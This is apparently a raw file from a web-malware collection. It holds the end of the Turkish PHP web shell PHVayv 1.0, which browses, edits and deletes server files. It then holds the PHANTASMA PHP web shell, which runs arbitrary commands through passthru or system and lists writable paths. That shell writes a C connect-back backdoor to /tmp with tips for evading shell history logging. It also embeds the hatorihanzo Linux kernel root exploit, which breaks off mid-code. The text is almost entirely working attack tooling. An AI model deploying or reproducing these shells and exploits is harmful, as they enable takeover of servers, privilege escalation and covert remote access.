<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
<tr>
<td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan Dosya</span></font></td>
<td bgcolor="#D6D6D6" height="1">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
<tr>
<td width="1" height="19"></td>
<td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
</tr>
<tr>
<td width="1" height="1"></td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
<tr>
<td width="100%" bgcolor="#000000">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#9F9F9F">
<form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
<br>
<textarea name="duzenx"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
while(! feof ( $baglan ) ){
$okunan=fgets($baglan,1024);
echo $okunan;
} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
<br>
</font></b>
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Kaydet"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span></p>
</form>
</td>
</tr>
<tr>
<td width="100%" bgcolor="#000000">
&nbsp;</td>
</tr>
</table>
<?
} else {
?>
<html>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>PHVayv 1.0</title>
</head>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
<td width="65">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
<tr>
<td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
onmouseover='this.style.background="D9D9D9"'
onmouseout='this.style.background="9F9F9F"'
style="CURSOR: hand"
>
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
<font color="#000000">Üst Klasör</font></a></font></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
<tr>
<td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
</tr>
<tr>
<td bgcolor="#000000" height="20">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
<tr>
<td align="center" bgcolor="#5F5F5F"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
height="19" bordercolor="#000000">
<span style="font-weight: 700">
<font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
</tr>
</table>
</td>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
bordercolor="#000000">
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
<a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
<font color="#9F9F9F">Yeni Klasör</font></a></font></td>
</tr>
</table>
</td>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
bordercolor="#000000">
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
<a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
<tr>
<td width="30" height="17" bgcolor="#9F9F9F">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
<td height="17" bgcolor="#9F9F9F">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya
Adý</font></td>
<td width="122" height="17" bgcolor="#9F9F9F">
<p align="center">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Ýþlem</font></td>
</tr>
</table>
<?
if ($sedat=@opendir($dizin)){
while (($ekinci=readdir ($sedat))){
if (is_dir("$dizin/$ekinci")){
?>
<? if ($ekinci=="." or $ekinci=="..") {
} else {
?>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
<tr>
<td width="30" height="17" bgcolor="#808080">
<p align="center">
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
<td height="17" bgcolor="#C4C4C4">
<font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
<td width="61" height="17" bgcolor="#C4C4C4" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
<tr>
<td width="100%" bgcolor="#A3A3A3"
onmouseover="this.style.background='#BBBBBB'"
onmouseout="this.style.background='#A3A3A3'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
<font color="#000000">Aç</font></a></font></td>
</tr>
</table>
</td>
<td width="60" height="17" bgcolor="#C4C4C4" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
<tr>
<td width="100%" bgcolor="#A3A3A3"
onmouseover="this.style.background='#BBBBBB'"
onmouseout="this.style.background='#A3A3A3'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
<font color="#000000">Sil</font></a>
</font></td>
</tr>
</table>
</td>
</tr>
</table>
<?
}
?>
<?
}}}
closedir($sedat);
?>
<?
if ($sedat=@opendir($dizin)){
while (($ekinci=readdir ($sedat))){
if (is_file("$dizin/$ekinci")){
?>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
<tr>
<td width="30" height="1" bgcolor="#B0B0B0">
<p align="center">
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
<td height="1" bgcolor="#EAEAEA">
<font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
<font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ( XXX )&nbsp;</font></td>
<td width="61" height="1" bgcolor="#D6D6D6" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
<tr>
<td width="100%" bgcolor="#D6D6D6"
onmouseover="this.style.background='#ACACAC'"
onmouseout="this.style.background='#D6D6D6'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
<font color="#000000">Düzenle</font></a></font></td>
</tr>
</table>
</td>
<td width="60" height="1" bgcolor="#D6D6D6" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
<tr>
<td width="100%" bgcolor="#D6D6D6" no wrap
onmouseover="this.style.background='#ACACAC'"
onmouseout="this.style.background='#D6D6D6'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
<font color="#000000">Sil</font></a></font></td>
</tr>
</table>
</td>
</tr>
</table>
<?
}}}
closedir($sedat);
?>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
<tr>
<td width="100%" bgcolor="#000000">&nbsp;</td>
</tr>
</table>
<tr>
<td width="100%" bgcolor="#000000">
</body></html><? } ?><? } ?><? } ?><? } ?>

634
web-malware-collection-13-06-2012/PHP/PHANTASMA.txt Normal file
View file

@ -0,0 +1,634 @@
<CENTER>
<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;">PHANTASMA- NeW CmD ;) </DIV>
<BR>
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3b700;">Informação do sistema</DIV>
<?php
//
closelog( );
$dono = get_current_user( );
$ver = phpversion( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;"><?= $info ?>: <?= $value ?></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Script Current User: <?= $dono ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">PHP Version: <?= $ver ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">User Info: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Current Path: <?= $chdir ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Server IP: <?php $aaa = gethostbyname($SERVER_NAME); echo $aaa;?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Web Server: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
</TR>
</TABLE>
<BR>
<?php
if ($cmd != "") {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Command Mode Run</DIV>";
?>
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Command Stdout</DIV>
<?php
if ($fe == 1){
$fe = "exec";
}
if ($fe == ""){
$fe = "passthru";
}
if ($fe == "2"){
$fe = "system";
}
if (isset($chdir)) @chdir($chdir);
ob_start( );
$fe("$cmd 2>&1");
$output = ob_get_contents();
ob_end_clean( );
?>
<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 12px;">
<?php
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</TEXTAREA>
<BR>
<?php
}
if ($safemode != "") {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Safemode Mode Run</DIV>";
?>
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Safe Mode Directory Listing</DIV>
<?php
if ($dir = @opendir($chdir)) {
echo "<TABLE border=1 cellspacing=1 cellpadding=0>";
echo "<TR>";
echo "<TD valign=top>";
echo "<b><font size=2 face=arial>List All Files</b> <br><br>";
while (($file = readdir($dir)) !== false) {
if (@is_file($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>";
// echo "<font color=green>$file1 - $file2 - $file </font><br>";
flush( );
}
}
echo "</TD>";
echo"<TD valign=top>";
echo "<b><font size=2 face=arial>List Only Folders</b> <br><br>";
if ($dir = @opendir($chdir)) {
while (($file = readdir($dir)) !== false) {
if (@is_dir($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=blue>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>$file</a><br>";
// echo "<font color=blue>$file1 - $file2 - $file </font><br>";
}
}
}
echo "</TD>";
echo"<TD valign=top>";
echo "<b><font size=2 face=arial>List Writable Folders</b><br><br>";
if ($dir = @opendir($chdir)) {
while (($file = readdir($dir)) !== false) {
if (@is_writable($file) && @is_dir($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=red>$file1 - $file2 - $file </font><br>";
}
}
}
echo "</TD>";
echo "</TD>";
echo "<TD valign=top>";
echo "<b><font size=2 face=arial>List Writable Files</b> <br><br>";
if ($dir = opendir($chdir)) {
while (($file = readdir($dir)) !== false) {
if (@is_writable($file) && @is_file($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=red>$file1 - $file2 - $file </font><br>";
}
}
}
echo "</TD>";
echo "</TR>";
echo "</TABLE>";
}
}
?>
<?php
if ($shell == "write") {
$shell = "#include <stdio.h>\n" .
"#include <sys/socket.h>\n" .
"#include <netinet/in.h>\n" .
"#include <arpa/inet.h>\n" .
"#include <netdb.h>\n" .
"int main(int argc, char **argv) {\n" .
" char *host;\n" .
" int port = 80;\n" .
" int f;\n" .
" int l;\n" .
" int sock;\n" .
" struct in_addr ia;\n" .
" struct sockaddr_in sin, from;\n" .
" struct hostent *he;\n" .
" char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
" \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
" \"For More Reliable Shell.\\n\"\n" .
" \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
" \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
" printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
" if (argc < 2 || argc > 3) {\n" .
" printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
" return 1;\n" .
" }\n" .
" printf(\"[*] Dumping Arguments\\n\");\n" .
" l = strlen(argv[1]);\n" .
" if (l <= 0) {\n" .
" printf(\"[-] Invalid Host Name\\n\");\n" .
" return 1;\n" .
" }\n" .
" if (!(host = (char *) malloc(l))) {\n" .
" printf(\"[-] Unable to Allocate Memory\\n\");\n" .
" return 1;\n" .
" }\n" .
" strncpy(host, argv[1], l);\n" .
" if (argc == 3) {\n" .
" port = atoi(argv[2]);\n" .
" if (port <= 0 || port > 65535) {\n" .
" printf(\"[-] Invalid Port Number\\n\");\n" .
" return 1;\n" .
" }\n" .
" }\n" .
" printf(\"[*] Resolving Host Name\\n\");\n" .
" he = gethostbyname(host);\n" .
" if (he) {\n" .
" memcpy(&ia.s_addr, he->h_addr, 4);\n" .
" } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
" printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
" return 1;\n" .
" }\n" .
" sin.sin_family = PF_INET;\n" .
" sin.sin_addr.s_addr = ia.s_addr;\n" .
" sin.sin_port = htons(port);\n" .
" printf(\"[*] Connecting...\\n\");\n" .
" if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
" printf(\"[-] Socket Error\\n\");\n" .
" return 1;\n" .
" }\n" .
" if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
" printf(\"[-] Unable to Connect\\n\");\n" .
" return 1;\n" .
" }\n" .
" printf(\"[*] Spawning Shell\\n\");\n" .
" f = fork( );\n" .
" if (f < 0) {\n" .
" printf(\"[-] Unable to Fork\\n\");\n" .
" return 1;\n" .
" } else if (!f) {\n" .
" write(sock, msg, sizeof(msg));\n" .
" dup2(sock, 0);\n" .
" dup2(sock, 1);\n" .
" dup2(sock, 2);\n" .
" execl(\"/bin/sh\", \"shell\", NULL);\n" .
" close(sock);\n" .
" return 0;\n" .
" }\n" .
" printf(\"[*] Detached\\n\\n\");\n" .
" return 0;\n" .
"}\n";
$fp = fopen("/tmp/dc-connectback.c", "w");
$ok = fwrite($fp, $shell);
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Connect Back Shell Was Successfuly Copied</DIV>";
} else {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Shell</DIV>";
}
}
if ($kernel == "write") {
$kernel = "/*\n" .
" * hatorihanzo.c\n" .
" * Linux kernel do_brk vma overflow exploit.\n" .
" *\n" .
" * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
" *\n" .
" * Further research and exploit development by\n" .
" * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
" *\n" .
" * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
" *\n" .
" * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
" * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
"*/\n" .
"#define _GNU_SOURCE\n" .
"#include <stdio.h>\n" .
"#include <stdlib.h>\n" .
"#include <errno.h>\n" .
"#include <string.h>\n" .
"#include <unistd.h>\n" .
"#include <fcntl.h>\n" .
"#include <signal.h>\n" .
"#include <paths.h>\n" .
"#include <grp.h>\n" .
"#include <setjmp.h>\n" .
"#include <stdint.h>\n" .
"#include <sys/mman.h>\n" .
"#include <sys/ipc.h>\n" .
"#include <sys/shm.h>\n" .
"#include <sys/ucontext.h>\n" .
"#include <sys/wait.h>\n" .
"#include <asm/ldt.h>\n" .
"#include <asm/page.h>\n" .
"#include <asm/segment.h>\n" .
"#include <linux/unistd.h>\n" .
"#include <linux/linkage.h>\n" .
"#define kB * 1024\n" .
"#define MB * 1024 kB\n" .
"#define GB * 1024 MB\n" .
"#define MAGIC 0xdefaced /* I should've patented this number -cliph */\n" .
"#define ENTRY_MAGIC 0\n" .
"#define ENTRY_GATE 2\n" .
"#define ENTRY_CS 4\n" .
"#define ENTRY_DS 6\n" .
"#define CS ((ENTRY_CS << 2) | 4)\n" .
"#define DS ((ENTRY_DS << 2) | 4)\n" .
"#define GATE ((ENTRY_GATE << 2) | 4 | 3)\n" .
"#define LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" .
"#define TOP_ADDR 0xFFFFE000U\n" .
"/* configuration */\n" .
"unsigned task_size;\n" .
"unsigned page;\n" .
"uid_t uid;\n" .
"unsigned address;\n" .
"int dontexit = 0;\n" .
"void fatal(char * msg)\n" .
"{\n" .
" fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" .
" if (dontexit) {\n" .
" fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" .
" kill(getpid(), SIGSTOP);\n" .
" for (;;) pause();\n" .
" }\n" .
" exit(EXIT_FAILURE);\n" .
"}\n" .
"void configure(void)\n" .
"{\n" .
" unsigned val;\n" .
" task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" .
" uid = getuid();\n" .
"}\n" .
"void expand(void)\n" .
"{\n" .
" unsigned top = (unsigned) sbrk(0);\n" .
" unsigned limit = address + PAGE_SIZE;\n" .
" do {\n" .
" if (sbrk(PAGE_SIZE) == NULL)\n" .
" fatal(\"Kernel seems not to be vulnerable\");\n" .
" dontexit = 1;\n" .
" top += PAGE_SIZE;\n" .
" } while (top < limit);\n" .
"}\n" .
"jmp_buf jmp;\n" .
"#define MAP_NOPAGE 1\n" .
"#define MAP_ISPAGE 2\n" .
"void sigsegv(int signo, siginfo_t * si, void * ptr)\n" .
"{\n" .
" struct ucontext * uc = (struct ucontext *) ptr;\n" .
" int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" .
" (void)signo;\n" .
" (void)si;\n" .
" error_code = MAP_NOPAGE + (error_code & 1);\n" .
" longjmp(jmp, error_code);\n" .
"}\n" .
"void prepare(void)\n" .
"{\n" .
" struct sigaction sa;\n" .
" sa.sa_sigaction = sigsegv;\n" .
" sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" .
" sigemptyset(&sa.sa_mask);\n" .
" sigaction(SIGSEGV, &sa, NULL);\n" .
"}\n" .
"int testaddr(unsigned addr)\n" .
"{\n" .
" int val;\n" .
" val = setjmp(jmp);\n" .
" if (val == 0) {\n" .
" asm (\"verr (%%eax)\" : : \"a\" (addr));\n" .
" return MAP_ISPAGE;\n" .
" }\n" .
" return val;\n" .
"}\n" .
"#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" .
"#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" .
"#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" .
"void map(unsigned * map)\n" .
"{\n" .
" unsigned addr = task_size;\n" .
" unsigned bit = 1;\n" .
" prepare();\n" .
" while (addr < TOP_ADDR) {\n" .
" if (testaddr(addr) == MAP_ISPAGE)\n" .
" *map |= bit;\n" .
" addr += PAGE_SIZE;\n" .
" next(map, bit);\n" .
" }\n" .
" signal(SIGSEGV, SIG_DFL);\n" .
"}\n" .
"void find(unsigned * m)\n" .
"{\n" .
" unsigned addr = task_size;\n" .
" unsigned bit = 1;\n" .
" unsigned count;\n" .
" unsigned tmp;\n" .
" prepare();\n" .
" tmp = address = count = 0U;\n" .
" while (addr < TOP_ADDR) {\n" .
" int val = testaddr(addr);\n" .
" if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" .
" if (!tmp) tmp = addr;\n" .
" count++;\n" .
" } else {\n" .
" if (tmp && count == LDT_PAGES) {\n" .
" errno = EAGAIN;\n" .
" if (address)\n" .
" fatal(\"double allocation\\n\");\n" .
" address = tmp;\n" .
" }\n" .
" tmp = count = 0U;\n" .
" }\n" .
" addr += PAGE_SIZE;\n" .
" next(m, bit);\n" .
" }\n" .
" signal(SIGSEGV, SIG_DFL);\n" .
" if (address)\n" .
" return;\n" .
" errno = ENOTSUP;\n" .
" fatal(\"Unable to determine kernel address\");\n" .
"}\n" .
"int modify_ldt(int, void *, unsigned);\n" .
"void ldt(unsigned * m)\n" .
"{\n" .
" struct modify_ldt_ldt_s l;\n" .
" map(m);\n" .
" memset(&l, 0, sizeof(l));\n" .
" l.entry_number = LDT_ENTRIES - 1;\n" .
" l.seg_32bit = 1;\n" .
" l.base_addr = MAGIC >> 16;\n" .
" l.limit = MAGIC & 0xffff;\n" .
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
" fatal(\"Unable to set up LDT\");\n" .
" l.entry_number = ENTRY_MAGIC / 2;\n" .
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
" fatal(\"Unable to set up LDT\");\n" .
" find(m);\n" .
"}\n" .
"asmlinkage void kernel(unsigned * task)\n" .
"{\n" .
" unsigned * addr = task;\n" .
" /* looking for uids */\n" .
" while (addr[0] != uid || addr[1] != uid ||\n" .
" addr[2] != uid || addr[3] != uid)\n" .
" addr++;\n" .
" addr[0] = addr[1] = addr[2] = addr[3] = 0; /* uids */\n" .
" addr[4] = addr[5] = addr[6] = addr[7] = 0; /* uids */\n" .
" addr[8] = 0;\n" .
" /* looking for vma */\n" .
" for (addr = (unsigned *) task_size; addr; addr++) {\n" .
" if (addr[0] >= task_size && addr[1] < task_size &&\n" .
" addr[2] == address && addr[3] >= task_size) {\n" .
" addr[2] = task_size - PAGE_SIZE;\n" .
" addr = (unsigned *) addr[3];\n" .
" addr[1] = task_size - PAGE_SIZE;\n" .
" addr[2] = task_size;\n" .
" break;\n" .
" }\n" .
" }\n" .
"}\n" .
"void kcode(void);\n" .
"#define __str(s) #s\n" .
"#define str(s) __str(s)\n" .
"void __kcode(void)\n" .
"{\n" .
" asm(\n" .
" \"kcode: \\n\"\n" .
" \" pusha \\n\"\n" .
" \" pushl %es \\n\"\n" .
" \" pushl %ds \\n\"\n" .
" \" movl $(\" str(DS) \") ,%edx \\n\"\n" .
" \" movl %edx,%es \\n\"\n" .
" \" movl %edx,%ds \\n\"\n" .
" \" movl $0xffffe000,%eax \\n\"\n" .
" \" andl %esp,%eax \\n\"\n" .
" \" pushl %eax \\n\"\n" .
" \" call kernel \\n\"\n" .
" \" addl $4, %esp \\n\"\n" .
" \" popl %ds \\n\"\n" .
" \" popl %es \\n\"\n" .
" \" popa \\n\"\n" .
" \" lret \\n\"\n" .
" );\n" .
"}\n" .
"void knockout(void)\n" .
"{\n" .
" unsigned * addr = (unsigned *) address;\n" .
" if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" .
" fatal(\"Unable to change page protection\");\n" .
" errno = ESRCH;\n" .
" if (addr[ENTRY_MAGIC] != MAGIC)\n" .
" fatal(\"Invalid LDT entry\");\n" .
" /* setting call gate and privileged descriptors */\n" .
" addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" .
" addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" .
" addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" .
" addr[ENTRY_CS+1] = 0x00cf9a00U;\n" .
" addr[ENTRY_DS+0] = 0x0000ffffU; /* user 4GB code at 0x00000000 */\n" .
" addr[ENTRY_DS+1] = 0x00cf9200U;\n" .
" prepare();\n" .
" if (setjmp(jmp) != 0) {\n" .
" errno = ENOEXEC;\n" .
" fatal(\"Unable to jump to call gate\");\n" .
" }\n" .
" asm(\"lcall $\" str(GATE) \",$0x0\"); /* this is it */\n" .
"}\n" .
"void shell(void)\n" .
"{\n" .
" char * argv[] = { _PATH_BSHELL, NULL };\n" .
